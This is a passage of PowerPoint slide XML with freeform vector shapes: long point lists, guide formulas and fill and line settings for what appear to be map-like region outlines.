                      <a:pt x="630" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="628" y="649"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="601" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="640"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36346" name="Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4462" y="2620"/>
                <a:ext cx="36" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 36"/>
                  <a:gd name="T1" fmla="*/ 32 h 32"/>
                  <a:gd name="T2" fmla="*/ 6 w 36"/>
                  <a:gd name="T3" fmla="*/ 28 h 32"/>
                  <a:gd name="T4" fmla="*/ 1 w 36"/>
                  <a:gd name="T5" fmla="*/ 26 h 32"/>
                  <a:gd name="T6" fmla="*/ 0 w 36"/>
                  <a:gd name="T7" fmla="*/ 16 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 36"/>
                  <a:gd name="T9" fmla="*/ 14 h 32"/>
                  <a:gd name="T10" fmla="*/ 2 w 36"/>
                  <a:gd name="T11" fmla="*/ 12 h 32"/>
                  <a:gd name="T12" fmla="*/ 5 w 36"/>
                  <a:gd name="T13" fmla="*/ 10 h 32"/>
                  <a:gd name="T14" fmla="*/ 10 w 36"/>
                  <a:gd name="T15" fmla="*/ 6 h 32"/>
                  <a:gd name="T16" fmla="*/ 13 w 36"/>
                  <a:gd name="T17" fmla="*/ 6 h 32"/>
                  <a:gd name="T18" fmla="*/ 14 w 36"/>
                  <a:gd name="T19" fmla="*/ 5 h 32"/>
                  <a:gd name="T20" fmla="*/ 15 w 36"/>
                  <a:gd name="T21" fmla="*/ 2 h 32"/>
                  <a:gd name="T22" fmla="*/ 17 w 36"/>
                  <a:gd name="T23" fmla="*/ 2 h 32"/>
                  <a:gd name="T24" fmla="*/ 21 w 36"/>
                  <a:gd name="T25" fmla="*/ 4 h 32"/>
                  <a:gd name="T26" fmla="*/ 23 w 36"/>
                  <a:gd name="T27" fmla="*/ 1 h 32"/>
                  <a:gd name="T28" fmla="*/ 27 w 36"/>
                  <a:gd name="T29" fmla="*/ 1 h 32"/>
                  <a:gd name="T30" fmla="*/ 32 w 36"/>
                  <a:gd name="T31" fmla="*/ 0 h 32"/>
                  <a:gd name="T32" fmla="*/ 36 w 36"/>
                  <a:gd name="T33" fmla="*/ 5 h 32"/>
                  <a:gd name="T34" fmla="*/ 35 w 36"/>
                  <a:gd name="T35" fmla="*/ 6 h 32"/>
                  <a:gd name="T36" fmla="*/ 32 w 36"/>
                  <a:gd name="T37" fmla="*/ 9 h 32"/>
                  <a:gd name="T38" fmla="*/ 29 w 36"/>
                  <a:gd name="T39" fmla="*/ 13 h 32"/>
                  <a:gd name="T40" fmla="*/ 27 w 36"/>
                  <a:gd name="T41" fmla="*/ 19 h 32"/>
                  <a:gd name="T42" fmla="*/ 28 w 36"/>
                  <a:gd name="T43" fmla="*/ 21 h 32"/>
                  <a:gd name="T44" fmla="*/ 27 w 36"/>
                  <a:gd name="T45" fmla="*/ 23 h 32"/>
                  <a:gd name="T46" fmla="*/ 25 w 36"/>
                  <a:gd name="T47" fmla="*/ 24 h 32"/>
                  <a:gd name="T48" fmla="*/ 17 w 36"/>
                  <a:gd name="T49" fmla="*/ 27 h 32"/>
                  <a:gd name="T50" fmla="*/ 13 w 36"/>
                  <a:gd name="T51" fmla="*/ 32 h 32"/>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36"/>
                  <a:gd name="T79" fmla="*/ 0 h 32"/>
                  <a:gd name="T80" fmla="*/ 36 w 36"/>
                  <a:gd name="T81" fmla="*/ 32 h 32"/>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36" h="32">
                    <a:moveTo>
                      <a:pt x="13" y="32"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36347" name="Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3908" y="1937"/>
                <a:ext cx="969" cy="679"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 433 w 969"/>
                  <a:gd name="T1" fmla="*/ 657 h 679"/>
                  <a:gd name="T2" fmla="*/ 409 w 969"/>
                  <a:gd name="T3" fmla="*/ 630 h 679"/>
                  <a:gd name="T4" fmla="*/ 379 w 969"/>
                  <a:gd name="T5" fmla="*/ 605 h 679"/>
                  <a:gd name="T6" fmla="*/ 388 w 969"/>
                  <a:gd name="T7" fmla="*/ 550 h 679"/>
                  <a:gd name="T8" fmla="*/ 362 w 969"/>
                  <a:gd name="T9" fmla="*/ 532 h 679"/>
                  <a:gd name="T10" fmla="*/ 299 w 969"/>
                  <a:gd name="T11" fmla="*/ 546 h 679"/>
                  <a:gd name="T12" fmla="*/ 253 w 969"/>
                  <a:gd name="T13" fmla="*/ 542 h 679"/>
                  <a:gd name="T14" fmla="*/ 213 w 969"/>
                  <a:gd name="T15" fmla="*/ 544 h 679"/>
                  <a:gd name="T16" fmla="*/ 183 w 969"/>
                  <a:gd name="T17" fmla="*/ 533 h 679"/>
                  <a:gd name="T18" fmla="*/ 141 w 969"/>
                  <a:gd name="T19" fmla="*/ 509 h 679"/>
                  <a:gd name="T20" fmla="*/ 105 w 969"/>
                  <a:gd name="T21" fmla="*/ 494 h 679"/>
                  <a:gd name="T22" fmla="*/ 81 w 969"/>
                  <a:gd name="T23" fmla="*/ 459 h 679"/>
                  <a:gd name="T24" fmla="*/ 78 w 969"/>
                  <a:gd name="T25" fmla="*/ 438 h 679"/>
                  <a:gd name="T26" fmla="*/ 50 w 969"/>
                  <a:gd name="T27" fmla="*/ 403 h 679"/>
                  <a:gd name="T28" fmla="*/ 27 w 969"/>
                  <a:gd name="T29" fmla="*/ 380 h 679"/>
                  <a:gd name="T30" fmla="*/ 20 w 969"/>
                  <a:gd name="T31" fmla="*/ 370 h 679"/>
                  <a:gd name="T32" fmla="*/ 10 w 969"/>
                  <a:gd name="T33" fmla="*/ 343 h 679"/>
                  <a:gd name="T34" fmla="*/ 28 w 969"/>
                  <a:gd name="T35" fmla="*/ 302 h 679"/>
                  <a:gd name="T36" fmla="*/ 70 w 969"/>
                  <a:gd name="T37" fmla="*/ 292 h 679"/>
                  <a:gd name="T38" fmla="*/ 111 w 969"/>
                  <a:gd name="T39" fmla="*/ 246 h 679"/>
                  <a:gd name="T40" fmla="*/ 125 w 969"/>
                  <a:gd name="T41" fmla="*/ 199 h 679"/>
                  <a:gd name="T42" fmla="*/ 152 w 969"/>
                  <a:gd name="T43" fmla="*/ 154 h 679"/>
                  <a:gd name="T44" fmla="*/ 204 w 969"/>
                  <a:gd name="T45" fmla="*/ 125 h 679"/>
                  <a:gd name="T46" fmla="*/ 228 w 969"/>
                  <a:gd name="T47" fmla="*/ 120 h 679"/>
                  <a:gd name="T48" fmla="*/ 273 w 969"/>
                  <a:gd name="T49" fmla="*/ 188 h 679"/>
                  <a:gd name="T50" fmla="*/ 337 w 969"/>
                  <a:gd name="T51" fmla="*/ 222 h 679"/>
                  <a:gd name="T52" fmla="*/ 445 w 969"/>
                  <a:gd name="T53" fmla="*/ 261 h 679"/>
                  <a:gd name="T54" fmla="*/ 515 w 969"/>
                  <a:gd name="T55" fmla="*/ 272 h 679"/>
                  <a:gd name="T56" fmla="*/ 606 w 969"/>
                  <a:gd name="T57" fmla="*/ 235 h 679"/>
                  <a:gd name="T58" fmla="*/ 631 w 969"/>
                  <a:gd name="T59" fmla="*/ 210 h 679"/>
                  <a:gd name="T60" fmla="*/ 683 w 969"/>
                  <a:gd name="T61" fmla="*/ 175 h 679"/>
                  <a:gd name="T62" fmla="*/ 732 w 969"/>
                  <a:gd name="T63" fmla="*/ 162 h 679"/>
                  <a:gd name="T64" fmla="*/ 670 w 969"/>
                  <a:gd name="T65" fmla="*/ 144 h 679"/>
                  <a:gd name="T66" fmla="*/ 718 w 969"/>
                  <a:gd name="T67" fmla="*/ 90 h 679"/>
                  <a:gd name="T68" fmla="*/ 747 w 969"/>
                  <a:gd name="T69" fmla="*/ 27 h 679"/>
                  <a:gd name="T70" fmla="*/ 796 w 969"/>
                  <a:gd name="T71" fmla="*/ 2 h 679"/>
                  <a:gd name="T72" fmla="*/ 881 w 969"/>
                  <a:gd name="T73" fmla="*/ 106 h 679"/>
                  <a:gd name="T74" fmla="*/ 965 w 969"/>
                  <a:gd name="T75" fmla="*/ 131 h 679"/>
                  <a:gd name="T76" fmla="*/ 938 w 969"/>
                  <a:gd name="T77" fmla="*/ 207 h 679"/>
                  <a:gd name="T78" fmla="*/ 911 w 969"/>
                  <a:gd name="T79" fmla="*/ 249 h 679"/>
                  <a:gd name="T80" fmla="*/ 865 w 969"/>
                  <a:gd name="T81" fmla="*/ 269 h 679"/>
                  <a:gd name="T82" fmla="*/ 833 w 969"/>
                  <a:gd name="T83" fmla="*/ 289 h 679"/>
                  <a:gd name="T84" fmla="*/ 759 w 969"/>
                  <a:gd name="T85" fmla="*/ 337 h 679"/>
                  <a:gd name="T86" fmla="*/ 769 w 969"/>
                  <a:gd name="T87" fmla="*/ 307 h 679"/>
                  <a:gd name="T88" fmla="*/ 723 w 969"/>
                  <a:gd name="T89" fmla="*/ 322 h 679"/>
                  <a:gd name="T90" fmla="*/ 695 w 969"/>
                  <a:gd name="T91" fmla="*/ 346 h 679"/>
                  <a:gd name="T92" fmla="*/ 738 w 969"/>
                  <a:gd name="T93" fmla="*/ 364 h 679"/>
                  <a:gd name="T94" fmla="*/ 764 w 969"/>
                  <a:gd name="T95" fmla="*/ 378 h 679"/>
                  <a:gd name="T96" fmla="*/ 720 w 969"/>
                  <a:gd name="T97" fmla="*/ 413 h 679"/>
                  <a:gd name="T98" fmla="*/ 755 w 969"/>
                  <a:gd name="T99" fmla="*/ 470 h 679"/>
                  <a:gd name="T100" fmla="*/ 745 w 969"/>
                  <a:gd name="T101" fmla="*/ 502 h 679"/>
                  <a:gd name="T102" fmla="*/ 759 w 969"/>
                  <a:gd name="T103" fmla="*/ 517 h 679"/>
                  <a:gd name="T104" fmla="*/ 746 w 969"/>
                  <a:gd name="T105" fmla="*/ 547 h 679"/>
                  <a:gd name="T106" fmla="*/ 725 w 969"/>
                  <a:gd name="T107" fmla="*/ 588 h 679"/>
                  <a:gd name="T108" fmla="*/ 694 w 969"/>
                  <a:gd name="T109" fmla="*/ 620 h 679"/>
                  <a:gd name="T110" fmla="*/ 659 w 969"/>
                  <a:gd name="T111" fmla="*/ 637 h 679"/>
                  <a:gd name="T112" fmla="*/ 630 w 969"/>
                  <a:gd name="T113" fmla="*/ 641 h 679"/>
                  <a:gd name="T114" fmla="*/ 601 w 969"/>
                  <a:gd name="T115" fmla="*/ 658 h 679"/>
                  <a:gd name="T116" fmla="*/ 583 w 969"/>
                  <a:gd name="T117" fmla="*/ 676 h 679"/>
                  <a:gd name="T118" fmla="*/ 554 w 969"/>
                  <a:gd name="T119" fmla="*/ 652 h 679"/>
                  <a:gd name="T120" fmla="*/ 521 w 969"/>
                  <a:gd name="T121" fmla="*/ 644 h 679"/>
                  <a:gd name="T122" fmla="*/ 472 w 969"/>
                  <a:gd name="T123" fmla="*/ 637 h 679"/>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969"/>
                  <a:gd name="T187" fmla="*/ 0 h 679"/>
                  <a:gd name="T188" fmla="*/ 969 w 969"/>
                  <a:gd name="T189" fmla="*/ 679 h 679"/>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969" h="679">
                    <a:moveTo>
                      <a:pt x="449" y="640"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="444" y="643"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="534"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
